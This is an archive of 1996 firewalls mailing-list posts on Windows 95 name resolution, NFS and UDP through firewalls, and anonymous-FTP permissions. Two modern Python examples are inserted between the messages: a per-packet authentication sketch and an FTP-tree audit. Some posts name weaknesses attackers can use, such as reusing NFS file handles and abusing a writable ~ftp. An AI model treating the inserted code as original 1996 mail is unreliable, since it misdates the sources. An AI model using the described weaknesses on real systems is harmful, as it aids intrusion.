e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sun Feb 4 15:23:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10424 for firewalls-outgoing; Sun, 4 Feb 1996 15:09:30 -0800 (PST) Received: from netlink.co.nz (NLserver1.netlink.co.nz [202.20.93.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10412 for ; Sun, 4 Feb 1996 15:09:25 -0800 (PST) Received: from manukau.govt.nz (kotuku.manukau.govt.nz [202.14.82.1]) by netlink.co.nz (8.6.12/8.6.6) with SMTP id MAA11751 for ; Mon, 5 Feb 1996 12:08:26 +1300 Received: from MAIN-Message_Server by manukau.govt.nz with Novell_GroupWise; Mon, 05 Feb 1996 12:11:28 +1200 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 05 Feb 1996 10:46:08 +1200 From: Matthew Thompson To: firewalls@greatcircle.com Subject: FW: Windows 95 clobbering firewall? -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Imagine that, A system told to use DNS for netbios name resolution actually tries to use DNS for netbios name resolution :-) 'Course you could enter these PC's into the DNS and watch the problem evaporate... Or configure DHCP+WINS. See Win NT resource kit 3.5, NT networking guide chapter 12 pg 201 for a discussion of Wins, Broadcast and DNS name resolution for Win NT IP clients. 
From firewalls-owner Sun Feb 4 15:53:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10602 for firewalls-outgoing; Sun, 4 Feb 1996 15:16:23 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA10572 for ; Sun, 4 Feb 1996 15:16:17 -0800 (PST)
Message-Id: <199602042316.PAA10572@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA238755723; Mon, 5 Feb 1996 10:15:23 +1100
From: Darren Reed
Subject: Re: anybody know of any vulnerabilities with "echo"
To: brian@ilinx.bctel.net, brian_murrell@bctel.net
Date: Mon, 5 Feb 1996 10:15:23 +1100 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Brian J. Murrell" at Feb 4, 96 02:10:10 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Brian J. Murrell, sie said:
>
> Hi Folks,
>
> At a particular Internet firewall I administer, I've noticed a rash of
> "echo" (udp port 7) service attempts. These came on pretty suddenly (as if
> a whole shwack of people found something out) and are pretty constant now.

If you disallow ICMP ECHO/ECHOREPLY (i.e. ping doesn't work), then using udp/7 is the next best thing to try to estimate RTT. Satan and other similar tools can make use of it.
darren

From firewalls-owner Sun Feb 4 15:59:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10480 for firewalls-outgoing; Sun, 4 Feb 1996 15:11:35 -0800 (PST)
Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA10475 for ; Sun, 4 Feb 1996 15:11:27 -0800 (PST)
Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA95; Sun, 4 Feb 1996 18:10:22 -0500
Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF32B.DE6C6920@rwcooper.RC.Toronto.on.ca>; Sun, 4 Feb 1996 18:09:04 -0500
Message-ID: <01BAF32B.DE6C6920@rwcooper.RC.Toronto.on.ca>
From: Russ
To: "firewalls@GreatCircle.COM"
Cc: "'Sick Puppy'"
Subject: RE: Negative impact of Windows 95 on firewall performance
Date: Sun, 4 Feb 1996 18:08:57 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sick Puppy said...

> The IP stack in Windows 95 allows a machine to use DNS as a last resort
> in resolving NetBIOS names. On early versions there was an advanced
> setup screen which had a tick box "Use DNS for NetBIOS" which allowed
> the user to disable this feature; it was enabled by default. On the
> present Win95 stack an entire subsection of the IP set up relating to
> low-level NetBIOS/IP has been completely eliminated so there is no
> longer a tick box. The subsection that was eliminated also contained
> the "Enable WINS Proxy" flag.

While it's true that you can't disable DNS lookups for NetBIOS names through the GUI anymore, you can still disable it through the registry. However, the method to do this looks like it will disable all DNS functionality.

Key:   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
Entry: EnableDNS
Value: 1 (default = yes)

Change the value to 0 = no, and no more NetBIOS lookups to your DNS, but other DNS lookups will still be executed.
I should also point out that LMHOSTS NetBIOS to IP entries will not be used when DNS is enabled unless they are prefixed with the #PRE option to preload them.

Sorry to have cluttered your mailboxes with all this Microsoft stuff, but I wanted to be able to go to sleep tonight knowing that your Firewall DNS will not come crashing down around your ears due to yet another Microsoft IP kerfuffle. ;-]

Cheers,
Russ Cooper, Senior Consultant - Internet
SHL/Computer Innovations - Consulting Services
Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
"Do you have the vision to see my future as I have projected it?"

From firewalls-owner Sun Feb 4 16:08:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11884 for firewalls-outgoing; Sun, 4 Feb 1996 15:54:31 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11853 for ; Sun, 4 Feb 1996 15:54:22 -0800 (PST)
Received: from pferguso-pc.cisco.com (c3robo12.cisco.com [171.68.13.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id PAA13152 for ; Sun, 4 Feb 1996 15:52:48 -0800
Message-Id: <199602042352.PAA13152@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 04 Feb 1996 18:53:27 -0500
To: firewalls@GreatCircle.COM
From: Paul Ferguson
Subject: Re: PC based sniffer
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Damn. I hate when that happens. Sorry for CC:'ing the list. Must be the weather. :-)

- paul

>X-Sender: pferguso@lint.cisco.com
>Date: Sun, 04 Feb 1996 17:11:41 -0500
>To: Tony Ferro
>From: Paul Ferguson
>Subject: Re: PC based sniffer
>Cc: firewalls@GreatCircle.COM
>Sender: firewalls-owner@GreatCircle.COM
>
>Hi, Tony.
>
>How's it going at Raptor?
>
>- paul
>

From firewalls-owner Sun Feb 4 16:28:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10444 for firewalls-outgoing; Sun, 4 Feb 1996 15:09:53 -0800 (PST)
Received: from staff.cs.su.OZ.AU (staff.cs.su.OZ.AU [129.78.8.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10430 for ; Sun, 4 Feb 1996 15:09:44 -0800 (PST)
Message-Id: <199602042309.PAA10430@miles.greatcircle.com>
Received: from staff.cs.su.oz.au by staff.cs.su.OZ.AU (mail from rex for firewalls@GreatCircle.COM) with MHSnet; Mon, 05 Feb 1996 10:08:44 +1100
Date: Mon, 05 Feb 1996 09:57:26 +1000
From: rex@staff.cs.su.oz.au (Rex di Bona)
Subject: NFS services and firewalls
To: firewalls@GreatCircle.COM
Reply-To: rex@cs.su.oz.au
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> We have a requirement to provide a network mountable filesystem in a
> shared development environment between the firewalls of ours and
> another company.
>
>                _________
>    us -------|_ fw-1 _|--------- them
>  NFS clients |  \ /   | NFS clients
>              |__\___/__|
>                 __|___
>                | NFS  |
>                |server|
>                |______|
>
>
> Under this configuration is it possible for 'us' to achieve a high
> level of security for our internal network under this configuration.
> We understand that FW-1 v2.0 makes it possible to selectively pass NFS
> (v2) traffic through the firewall.

Given that, once you know an NFS File Handle cookie, you can access that file (or directory hierarchy) as any non-root user, allowing multiple, independent, exports gains you nothing - there really is nothing very secure about NFS.

Now if you want something more secure for serving NFS then boy, I have a product for you :-) (Commercial plug :-)

If all the disks that are NFS exported from the server are to be used by BOTH companies, and if all data can be easily accessed by all people at both companies then, yes, this is a satisfactory solution to your problem.
Just make sure that only the data disk is shared, and is shared with the same perms to both sides.

> We would make the server as secure as possible with almost no logins,
> functionally limited to the main task of serving NFS and only NFS mount
> connections permitted incoming from them. From our side to the server
> appropriate outgoing access for management and NFS client connections.

Why have any logins? The machine will have a console?

> How easy is it for someone to compromise internal hosts via the NFS server?

Only if internal hosts depended on the NFS server for system data. If the NFS server only contains 'business' data all you can lose is your business :-)

I.e. consider all things on the NFS server as publicly readable/writable - does this affect your decision to use an NFS server?

> If there is a serious problem with this, would using NFS (v3) significantly
> improve things?

I can't say, as I still haven't found a copy of the NFS v3 spec (not that I've looked hard) - anybody know of a URL?

>
> Ian H. Good (604) 293-5113 igood@mpr.ca
> MPR Teltech Ltd. fax (604) 293-5787 http://www.mpr.ca/
> Burnaby BC Canada V5A-4B5
>

From firewalls-owner Sun Feb 4 16:35:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10986 for firewalls-outgoing; Sun, 4 Feb 1996 15:26:38 -0800 (PST)
Received: from ns1.ncic.net ([204.144.225.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10981 for ; Sun, 4 Feb 1996 15:26:34 -0800 (PST)
Received: (from jamison@localhost) by ns1.ncic.net (8.6.12/8.6.9) id MAA08599 for firewalls@greatcircle.com; Sun, 4 Feb 1996 12:55:06 -0700
Date: Sun, 4 Feb 1996 12:55:06 -0700
From: Jamison Gulden
Message-Id: <199602041955.MAA08599@ns1.ncic.net>
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks to all who responded to my post about UDP proxying.
Here's some comments and summary:

Most replies were responses to my saying:

> We've based our protocol on both UDP and TCP and have significant
> reasons for wanting to use UDP. I've seen some reluctance from
> folks here to pass anything that smells of UDP.

This last sentence was more in humor than my not understanding the problems. But thanks to all who tried to educate me on the subject.

My basic question is how to support firewalls if we are developing a protocol based upon UDP. Should we use an existing mechanism like SOCKS V5 or build our own. Most replies said "just say no" to UDP. What I may not have made clear is that we have included strong per packet authentication to our protocol which hopefully will calm most sysadmins' fears. About all I got was a couple people who said they don't use SOCKS and a couple who want real application proxies. Is a "real application proxy" just one written for a specific application?

Responses:
---------------------
> From proberts@clark.net Sat Jan 27 22:10:47 1996
> I have some specific proxy ideas that I'd like to discuss, to see
> how much their impact on the development process is. I'd say a
> *really* good start would be a fixed port number on both the client and

I don't think I like the idea of fixed port numbers for the client. This would not allow multiple clients to run concurrently and may make the client more prone to attack. Any comments on that last statement?

> > BTW, does anyone use SOCKS? Is it worth supporting now?
>
> I'd like to see real application proxies. Socks isn't in use at any of my
> company's sites (so far as I know), though V5 is starting to look
> interesting.

> > Actually, we are trying to build in a fairly high level of
> > authentication into the protocol.
>
> Authentication of the client, or the packet?

Authentication is on a per packet basis.

---------------------
> From: Ted Stockwell
> > BTW, does anyone use SOCKS? Is it worth supporting now?
>
> I can't say. Sidewinder doesn't support socks because it, like other
> firewalls with transparent proxies, doesn't need it.
>
> > What would other firewall maintainers want out of a company
> > developing a new protocol based upon UDP?
>
> That's a tough question. I'd like to understand the networking
> requirements of the application better, and then look at what this
> means for a firewall.

The clients are meant to run continuously while a user is logged in and will occasionally need to send small messages to the server. The server may send small messages back to the client at any time. It would not work well to keep a TCP connection open at all times and the messages are small enough that TCP overhead is significant to set up a connection for each message.

---------------------
> From: Darren Reed
>
> > Basically my question boils down to this:
> > If you have to create a new protocol what is the best way to
> > support firewalls?
>
> Make sure it can work with an application level gateway of some
> sort, invisibly, if need be.
>
> > What would other firewall maintainers want out of a company
> > developing a new protocol based upon UDP?
>
> A protocol spec including rationale for using UDP ?
>
> However, if I read your mail right, your new protocol isn't UDP or TCP,
> but a protocol at the IP level. You might wish to submit an RFC to the
> RFC as experimental or even submit it to the right group as a draft for
> movement through the official standards track. Or even do this anyway ?

Actually, we do plan on using UDP as the basis if for no other reason than UDP seems to be the lowest overhead protocol available above IP. I suppose we could build directly on top of IP but I'm not sure what implications that might have on things like network routing, filtering, firewalls, cross platform availability, etc.

---------------------
> From: Tim Keanini
>
> > > We've based our protocol on both UDP and TCP and have significant
> > > reasons for wanting to use UDP.
>
> I would like to take a few lines to put my spin on this.
> Protocols "work" when they can implement the policy to the letter.
> If the policy is based on who has initiated the connection, that
> sort of policy sticks well to TCP but slides right off of UDP.
> [...]
> Things start to get real interesting when you have a policy like
> "anyone with a blue hat can enter" and all you have is a doorknob
> to work with. Time to call MacGyver.

The idea is that there is a client and a server. The client can talk to the server and the server can talk to any of the clients. Every UDP packet has authentication information to validate if the packet was actually sent by who it supposedly came from.

> The state based packet filters help you "manage the risk" of
> not knowing who really set up the connection of UDP but that
> is something that is all that we can do.
>
> If we are doing anything right, our job is to manage risk.

If I've done my job right, the proper management of those risks will have been built into the protocol with sufficient assurance that it cannot easily be hacked.
Thanks,
Jamie

From firewalls-owner Sun Feb 4 16:53:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA14604 for firewalls-outgoing; Sun, 4 Feb 1996 16:38:31 -0800 (PST)
Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA14597 for ; Sun, 4 Feb 1996 16:38:25 -0800 (PST)
Received: from mculver by ncelec.com (5.4R3.10/200.2.1.5) id AA17750; Sun, 4 Feb 1996 16:31:45 -0800
Message-Id: <2.2.32.19960205003625.0069edd0@ncelec.com>
X-Sender: mculver@ncelec.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 04 Feb 1996 16:36:25 -0800
To: "Russ.Cooper@RC.Toronto.on.ca"
From: Mike Culver
Subject: RE: Negative impact of Windows 95 on firewall performance
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Good Point!

I'm referring to the hosts file on your UNIX server, or wherever DNS lives.

At 05:43 PM 2/4/96 -0500, you wrote:
>"if the "Computer Name" is listed in hosts, I'm fairly certain that the entry works."
>
>Which hosts file are you referring to here, the one on the Windows '95 machine?
>Cheers,
>Russ Cooper, Senior Consultant - Internet
>SHL/Computer Innovations - Consulting Services
>Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
>"Do you have the vision to see my future as I have projected it?"
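The per-packet authentication that Jamison Gulden's summary above says his UDP protocol carries, sketched as an added example. This is not his protocol and not code from any firewall vendor named on the page: each datagram carries a client id, a sequence number and an HMAC over both plus the payload, and the server keeps a sliding replay window per client. The 16-byte client id, 64-bit sequence number, HMAC-SHA256 tag and 64-packet window are assumptions chosen for the illustration, as is the `seal`/`Receiver` naming.

```python
import hashlib
import hmac
import struct

# Wire format assumed for this example: 16-byte client id, 64-bit big-endian
# sequence number, payload, then a 32-byte HMAC-SHA256 tag over everything
# before it. Constructed purely to illustrate per-packet authentication.
HEADER = struct.Struct("!16sQ")
TAG_LEN = 32


def seal(key, client_id, seq, payload):
    """Build one authenticated datagram: header || payload || tag."""
    if len(client_id) != 16:
        raise ValueError("client_id must be 16 bytes")
    body = HEADER.pack(client_id, seq) + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()


class Receiver:
    """Server side: verify the tag, then reject replays with a sliding window.

    keys maps client id -> shared secret. The window (default 64 packets, the
    same idea as IPsec anti-replay) lets slightly reordered datagrams through
    while refusing any sequence number that was already accepted.
    """

    def __init__(self, keys, window=64):
        self.keys = keys
        self.window = window
        self._state = {}  # client id -> (highest seq seen, bitmap of recent seqs)

    def open(self, datagram):
        """Return (client_id, payload) for an authentic, fresh datagram, else None."""
        if len(datagram) < HEADER.size + TAG_LEN:
            return None
        body, tag = datagram[:-TAG_LEN], datagram[-TAG_LEN:]
        client_id, seq = HEADER.unpack_from(body)
        key = self.keys.get(client_id)
        if key is None:
            return None  # unknown sender: a spoofed source gets no further
        expected = hmac.new(key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return None  # forged, corrupted, or sealed under the wrong key
        if not self._fresh(client_id, seq):
            return None  # replayed, or older than the window
        return client_id, body[HEADER.size:]

    def _fresh(self, client_id, seq):
        """Bit 0 of the bitmap is `highest`; bit k is `highest - k`."""
        highest, seen = self._state.get(client_id, (-1, 0))
        mask = (1 << self.window) - 1
        if seq > highest:
            shift = seq - highest
            seen = ((seen << shift) | 1) & mask if shift < self.window else 1
            self._state[client_id] = (seq, seen)
            return True
        offset = highest - seq
        if offset >= self.window or (seen >> offset) & 1:
            return False
        self._state[client_id] = (highest, seen | (1 << offset))
        return True


if __name__ == "__main__":
    key = b"shared-secret-for-client-A"
    client = b"client-A........"  # 16 bytes
    rx = Receiver({client: key})
    first = seal(key, client, 0, b"hello")
    print(rx.open(first))  # accepted
    print(rx.open(first))  # None: replay
```

What this buys and what it does not: the server only acts on datagrams whose tag verifies under a key it holds and whose sequence number it has not accepted before, so a stateless UDP filter's inability to say who "started" an exchange is compensated at the application layer. It gives no confidentiality (add encryption if the payload matters), it does not stop the firewall from seeing UDP from arbitrary source addresses, so the filter should still pin the server port and rate-limit, and key distribution is outside the example.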
From firewalls-owner Sun Feb 4 18:13:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18917 for firewalls-outgoing; Sun, 4 Feb 1996 18:03:27 -0800 (PST)
Received: from brolga.cc.uq.oz.au (brolga.cc.uq.oz.au [130.102.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18912 for ; Sun, 4 Feb 1996 18:03:22 -0800 (PST)
Received: from cc.uq.oz.au by brolga.cc.uq.oz.au id <21447-0@brolga.cc.uq.oz.au>; Mon, 5 Feb 1996 12:01:56 +1000
From: eric@cc.uq.oz.au (Eric Halil)
Date: Mon, 5 Feb 1996 12:01:51 +1000
X-Mailer: Mail User's Shell (7.2.3 5/22/91)
To: Brad VanOrden , maddouri@ensi.rnrt.tn, firewalls@GreatCircle.com
Subject: Re: Securing an anonymous ftp acces
Message-ID: <"brolga.cc.uq:214590:960205020208"@cc.uq.oz.au>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Brad VanOrden writes:
>I would suggest two sources. I have always found "UNIX System Administration
>Handbook" by Evi Nemeth, Garth Snyder, and Scott Seebass to be invaluable
>and they tell you how to set up anonymous ftp. It is published by Prentice
>Hall and had a 2nd edition published about one year ago. You can reach them
>at 800-947-7700.

An excellent book! However there is a nasty mistake in their recommended permissions and ownerships for files under ~ftp. They suggest that ~ftp be owned by ftp. This can allow intruders to do lots of evil things. A much more secure configuration is to have it owned by root. This has been reported to the authors and will be corrected in a future printing.

>The other is CERT advisory 93:10. It is available via anonymous ftp at:
>cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity. This also
>gives you detailed instructions on how to set up anonymous ftp.

This has more secure permissions for ~ftp and other useful suggestions too.

Eric.
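A check for the ownership rule Eric Halil states above, as an added example that is not from the book, the CERT advisory or the original post: walk the anonymous-ftp tree and report anything owned by the ftp account (which should own nothing under ~ftp) or writable by group or other, with an allow-list for an intentional drop directory such as ~ftp/incoming. The ftp uid is passed in explicitly rather than looked up with `pwd`, so the check can be run against a copy of the tree or in a test; the function name and the finding labels are mine.

```python
import os
import stat


def audit_ftp_root(root, ftp_uid, allow_writable=()):
    """Return a sorted list of (relative path, problem) for an anonymous-ftp tree.

    Problems reported:
      owned-by-ftp      entry is owned by the ftp account; an anonymous user who
                        can become that uid (e.g. through the ftp daemon) could
                        chmod it and then replace ~ftp/bin/ls, ~ftp/etc/passwd
                        or drop a .rhosts. CERT's layout has root own everything.
      writable          group- or world-writable and not on the allow-list.
      writable-dropbox  writable but listed in allow_writable; shown so it can
                        still be reviewed (it should be mode 1733 or similar,
                        not readable, so it cannot be used as a warez relay).
      symlink           symlinks are listed for review rather than judged,
                        since inside a chroot they resolve relative to ~ftp.
    """
    findings = []
    allowed = {os.path.normpath(p) for p in allow_writable}

    def check(path):
        st = os.lstat(path)  # do not follow links: judge the entry itself
        rel = os.path.normpath(os.path.relpath(path, root))
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            findings.append((rel, "symlink"))
            return  # lstat reports 0777 for links; a writable check is meaningless
        if st.st_uid == ftp_uid:
            findings.append((rel, "owned-by-ftp"))
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((rel, "writable-dropbox" if rel in allowed else "writable"))

    check(root)
    for dirpath, dirnames, filenames in os.walk(root):  # followlinks=False
        for name in dirnames + filenames:
            check(os.path.join(dirpath, name))
    return sorted(findings)


if __name__ == "__main__":
    import pwd
    import sys

    ftp_home = sys.argv[1] if len(sys.argv) > 1 else "/home/ftp"  # assumed path
    uid = pwd.getpwnam("ftp").pw_uid
    for rel, problem in audit_ftp_root(ftp_home, uid, allow_writable=["incoming"]):
        print(f"{problem:17s} {rel}")
```

An empty result means nothing under the tree is ftp-owned or writable; a listing that starts with `.` being owned-by-ftp is exactly the misconfiguration the post describes.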
From firewalls-owner Sun Feb 4 18:48:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19005 for firewalls-outgoing; Sun, 4 Feb 1996 18:08:34 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA19000 for ; Sun, 4 Feb 1996 18:08:28 -0800 (PST) Received: from beach.sctc.com by relay4.UU.NET with ESMTP id QQabmv09438; Sun, 4 Feb 1996 15:18:37 -0500 (EST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA12021; Sun, 4 Feb 1996 14:15:21 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA12017; Sun, 4 Feb 1996 14:15:20 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id OAA04528; Sun, 4 Feb 1996 14:15:53 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id OAA27086; Sun, 4 Feb 1996 14:15:53 -0600 Date: Sun, 4 Feb 1996 14:15:53 -0600 From: Rick Smith Message-Id: <199602042015.OAA27086@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, watt@sware.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Watt writes: > Reread my message. It had nothing to do with >labeled IP. It simply used the security features provided by a >typical MAC-enforcing protocol stack to duplicate the features of >a system based on TE. No labels for network data required. I reread your message and I stand corrected. If I follow things correctly, the SecureWare approach omits labels at the appropriate point in the network stack so that subjects at different levels may share it. I assume that there's some mechanism to ensure the binding between ports and levels. 
I've read your posts in the past and found it peculiar that you'd suggest something so bizarre as to label Internet traffic. I should have realized it was a misunderstanding. > But TE provides no advantage >over a similar system based on MAC, such as the Harris firewall. I'm not about to restart a several week discussion that we've just concluded, but the statement "no advantage" is excessive. The relative merits of TE and MLS are tied to how one assesses the threat, which really depends on what the customer is protecting. Rick. smith@sctc.com secure computing corporation From firewalls-owner Mon Feb 5 02:21:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA04081 for firewalls-outgoing; Mon, 5 Feb 1996 01:52:59 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA04067 for ; Mon, 5 Feb 1996 01:52:53 -0800 (PST) Received: from old-bb.hks.net (old-bb.hks.net [199.183.60.22]) by bb.hks.net (8.7/8.7-hks1) with SMTP id EAA06069 for ; Mon, 5 Feb 1996 04:49:11 -0500 Received: (from field@localhost) by old-bb.hks.net (8.6.9/8.6.9-bb2) id EAA11563 for firewalls@bb.hks.net; Mon, 5 Feb 1996 04:48:26 -0500 Received: from GATEWAY by bb.com with netnews for firewalls@bb.hks.net (firewalls@bb.hks.net) To: firewalls@bb.hks.net Date: 5 Feb 1996 04:49:06 -0500 From: bressen@hks.net (Andrew K. Bressen) Message-ID: <4f4jqi$5t7@bb.hks.net> Organization: HKS.net References: <256176126.339531179@va.arca.com> Subject: Re: Firewall API's Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <256176126.339531179@va.arca.com>, Jeff Williams wrote: >We're wondering whether or not it is common practice to provide an API so >that we can create our own proxy applications if we want to. At least one >vendor has said "No way". well, TIS Gauntlet (and FWTK) has a "plug-board" proxy that can be used to proxy a given TCP port (or maybe even port pair). 
you could also look into SOCKS.

I'm not sure what the status of skronk and gssapi are, or if they could be applied to this problem.

>Is it reasonable to expect such an API with a firewall product? What's the
>best way to find out which ones do or do not?

reasonable, sure. realistic, I dunno.
many firewall vendors wish to give out as little info as possible about the innards of their systems, and users adding things to those systems is generally not supported.

From firewalls-owner Mon Feb 5 02:38:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA05645 for firewalls-outgoing; Mon, 5 Feb 1996 02:28:15 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA05629 for ; Mon, 5 Feb 1996 02:28:08 -0800 (PST)
Message-Id: <199602051028.CAA05629@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA178906048; Mon, 5 Feb 1996 21:27:28 +1100
From: Darren Reed
Subject: Re: NFS services and firewalls
To: igood@mprgate.mpr.ca (Ian Good)
Date: Mon, 5 Feb 1996 21:27:28 +1100 (EDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <9602021826.AA23441@edzo.mpr.ca> from "Ian Good" at Feb 2, 96 10:26:39 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Ian Good, sie said:
[...]
> If there is a serious problem with this, would using NFS (v3) significantly
> improve things?

If coupled with NIS+ (DES credentials only), then it is more secure for allowing the remote box to mount and use your disks than using regular NFS/RPC. The public key part of NIS+ is fairly weak, by comparison with PGP and still open to the same timing attacks.

However, you want to make sure you're using TCP for NFS (v3 provides this), although this limits your problems to TCP rather than UDP.
Given the number of attacks available through both protocols, it's a matter of choosing the one with the least security problems. NFS over TCP could be a win if the anti-hijacking code in FW-1 v2 works well.

You may wish to consider using AFS (which can take advantage of Kerberos) or another network filesystem with stronger authentication than NFS.

Ideally, however, you'd use SunScreen (or something similar) between your site and the other for all the NFS traffic, even if you're running over a private line, to make sure all your data (which I presume is confidential if you're putting the server behind the firewall) is encrypted when crossing cables/networks not owned by yourself.

darren

From firewalls-owner Mon Feb 5 06:08:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11371 for firewalls-outgoing; Mon, 5 Feb 1996 05:54:35 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA11366 for ; Mon, 5 Feb 1996 05:54:31 -0800 (PST)
Message-Id: <199602051354.FAA11366@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA205128423; Tue, 6 Feb 1996 00:53:43 +1100
From: Darren Reed
Subject: Mazama Packet Filter: Misleading advertising
To: Firewalls@GreatCircle.COM (Firewalls Mailing List)
Date: Tue, 6 Feb 1996 00:53:43 +1100 (EDT)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The following appears on one of their web pages: (http://www.mazama.com/mpf12desc.html):

...
TECHNICAL SECURITY FEATURE LIST
_________________________________________________________________

* Blocking of all services which are not explicitly enabled.
* Blocking of ICMP Redirect Packets.
* Blocking of IP Source Route options.
* Blocking of Spoofed IP addresses.
* Blocking of Spoofed IP fragments.
* Dangerous services such as rsh/rlogin, X window, Openwindows, NFS, and other RPC services are blocked by default.
* TCP Services use SYN/ACK checking to verify the direction of all TCP connections.
* We have used SATAN to analyze MPF installations and verified that the above security problems are solved by MPF. The current version of MPF can detect port scans from SATAN and automatically block all packets from a host running SATAN.
...

The last item is what I would draw your attention to. SATAN does *NOT* test all of the above. In fact, it only does the first. Well, to be pedantic, it doesn't look for blocked services, but scans looking for services which are active and are possible avenues for a break-in. That is unless they developed their own plug-in tests for SATAN, which their web page doesn't brag about, so I'll assume to not be the case O:).

Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything when it blocks out an entire host when it notices a SATAN style attack.

Now, if they had mentioned ISS, I might take it more seriously and assume that maybe 3 or more of the above had been checked...

IMHO, that particular page stinks...(you can find other rich comments there, too...)...probably from Marcus's dead chicken that they waved around and dropped there ;)

darren

(p.s.
